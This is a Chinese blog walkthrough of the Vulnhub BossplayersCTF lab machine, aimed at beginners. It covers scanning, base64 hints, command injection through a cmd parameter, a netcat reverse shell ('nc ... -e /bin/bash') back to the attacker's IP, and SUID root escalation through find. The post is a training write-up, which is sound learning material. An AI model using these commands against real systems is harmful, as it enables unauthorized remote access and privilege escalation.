看完这篇 教你玩转渗透测试靶机vulnhub——BossplayersCTF

已于 2023-01-17 14:28:54 修改
阅读量1.1k 收藏 5
点赞数 4
分类专栏: 渗透测试 # Vulnhub靶场 文章标签: vulnhub靶机 CTF
于 2022-05-06 02:10:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/124601086
版权

Vulnhub靶机BBossplayersCTF渗透测试详解

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是新手CTF得靶机还是老样子找到flag.txt即可。

Vulnhub靶机下载:

官网地址:https://www.vulnhub.com/entry/bossplayersctf-1,375/

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM即可。
在这里插入图片描述
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机
在这里插入图片描述
渗透机:kali IP :192.168.0.101 靶机IP :192.168.0.100

使用命令:nmap -sS -sV -A -n 192.168.0.100
在这里插入图片描述

发现开启了80端口和22端口,先访问一下80端口 dirb扫一下后台发现index.txt,robots.txt,server-status 依次进行访问。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
先访问一下robots.txt 发现了一串base64加密数值 放kali解密一下 它让我们在努力点兄弟,哈哈哈哈。
在这里插入图片描述
在这里插入图片描述
我们再看看logs.php 看源码会比较完整一点,发现并没有什么可用信息继续访问server-status 也没有可用信息。
在这里插入图片描述
在这里插入图片描述
在看看index.html 查看一下源码 在最下面发现一串base64 继续解码解了三次发现一个php文件:workinginprogress.php
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

②:命令执行漏洞:

访问这个文件好像可以命令执行 可以使用工具wfuzz检测 我这里直接手动了

http://192.168.0.100/workinginprogress.php?cmd=id

在这里插入图片描述
在这里插入图片描述

③:反弹shell:

先看看靶机里面有没有nc 可以利用漏洞使用命令:http://192.168.0.100/workinginprogress.php?cmd=ls /usr/bin|grep nc
在这里插入图片描述
接着开启本机kali 开启监听端口6666 执行:192.168.0.100/workinginprogress.php?cmd=nc 192.168.0.101 6666 -e/bin/bash

使用python开启交互:python -c "import pty;pty.spawn('/bin/bash')"
在这里插入图片描述

④:suid提权:

使用命令:find / -perm -u=s -type f 2>/dev/null 查找具有suid权限的文件,通过find提权,获得权限。
在这里插入图片描述
使用命令:find . -exec /bin/bash -p \;
在这里插入图片描述

⑤:获取flag:

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
至此得到了congratulations祝贺自己,渗透测试结束。

Vulnhub靶机渗透总结:

这个靶场比较适合新手 比较基础容易上手 总结一下知识点:
①:netdiscover 工具得使用
②:nmap的基础使用 (具体可以学一下脚本的使用)
③:dirb (web目录扫描工具)
④:wfuzz 工具得使用
⑤:suid提权 (Linux提权大家可以学习一下)
第一次凌晨熬夜创作,希望对刚学网安的小白有所帮助 (最后一天假期肝一下,明天返校了)感谢支持!!**

落寞的魚丶
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
靶机bossplayerCTF
mobai1399的博客
03-06 249
bossplayerCTF靶机 靶机扫 arp-scan -interface eth0 192.168.199.0/24 Interface: eth0, datalink type: EN10MB (Ethernet) Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) 192.168.199.146 00:0c:29:5b:44:aa VMware, Inc. 4 packets re
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
BossPlayerCTF
weixin_44770698的博客
02-15 1071
靶场练习-52
靶机vulnhub靶机clover:1
weixin_52450702的博客
02-02 516
靶机vulnhub靶机clover:1,附post传参时间注入。
Vulnhub靶机之bossplayerCTF简单记录,2024网络安全高频精选面试题讲解
2401_84102979的博客
04-04 539
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【整版领取方式在文末!!
[Vulnhub靶机] DriftingBlues: 5
haosha。的博客
02-13 1917
[Vulnhub靶机] DriftingBlues: 5靶机渗透思路及方法(个人分享)
Vulnhub系列靶机-THM-ContainMe-v4
来日可期的博客
09-16 1182
详细解析:通过执行此命令,wfuzz将发送HTTP请求到目标URL,并使用字典文件中的词进行模糊测试。wfuzz是一款用于Web应用程序模糊测试的开源工具,它可以帮助用户识别Web应用中存在的漏洞和安全问题。之前在查看etc下的passwd文件的时候有一个mike用户,到该用户的目录下面查看是否有有用的信息。但是之前在mike用户的目录下还发现了.ssh 的文件,查看里面有什么。发现我们拼接的参数执行了,试着查看etc下的passwd文件。:这里将文件下载到tmp目录下,因为其他的目录没有写入的权限。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
[vulnhub系列]Chili-靶机
薛定谔嘚喵博客
03-07 1279
在该靶机渗透流程中,前端的信息收集尤为重要,爆破web网页中,查看源代码是很有益处的,可以看到一些敏感信息。以及一些爆破工具的使用,hydra工具是此次渗透的关键,爆破出了ftp账号密码;然后使用ftp端口服务进行ftp权限登陆,查看可执行文件类型,而后生成shell脚本,访问网页,进行反弹shell,得到shell;
这篇 渗透测试靶机Vulnhub——Momentum:2
Aluxian_的博客
09-09 752
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:这个是Momentum系列一共有2个靶机,分别是1.2老样子需要获得root权限找到flagmedium。
这篇 渗透测试靶机Vulnhub——DriftingBlues-1
Aluxian_的博客
06-02 1146
Vulnhub靶机DriftingBlues-1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。 Vulnhub靶机下载: 官网地址: https://w
vulnhub靶机-THALES: 1
臭nana的博客
03-18 4565
1、找到靶机ip:192.168.1.106 nmap -sn 192.168.1.0/24 2、扫描靶机端口,开放22和8080端口 3、先搜索对应中间件有没有公开漏洞,没有发现,于是先从8080端口入手,访问之后是一个tomcat服务默认页面,先扫描一下目录 可疑的就只有shell目录,但是访问就一直圈,跟平常反弹shell的页面一样,所以猜测应该是作者测试时上传的,结合tomcat和shell目录,可以猜想应该是tomcat后台布置war包getshell,但是管理后台需要...
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 8617
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
BossPlayerCTF(1),算法+分布式+微服务
最新发布
m0_58397123的博客
04-05 871
仅开放了22和80两个端口!
VulnHub-bossplayersCTF
sanqin_的博客
11-21 299
靶机 DHCP 未能正确分配 IP :看这里 靶机地址:http://www.vulnhub.com/entry/bossplayersctf-1,375/ 正常流程,先上nmap nmap -sV ip/mask 可见开放两个端口,ssh 和 http 先访问 http 看看,同时 dirb 去扫 dirb http://ip 查看一下 txt 又是一串 base64 解密: … 好吧下一个 给出网站,添加host vim /etc/hosts 访问网站…和访问 ip 地址的网页一模一样,
CTF bossplayers 靶机
Jim2g
07-29 216
WAYs: robots.txt文件提供线索,命令执行漏洞获得反弹shell suid命令提升权限 1:netdiscover 发现主机地址192.168.1.109 2:使用namp进行端口扫描发现打开了80和22端口 3:fuzz目录看能否有什么线索 4:挨个访问发现robots.txt 一串base32加密的密码 但是可能现在没什么用,我们审计源码发现注释了一串base64加密后的代码,我们解密发现是这php页面。 5:通过这个页面发现有代码执行漏洞 6:我们尝试一下是否存在 7:我们
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值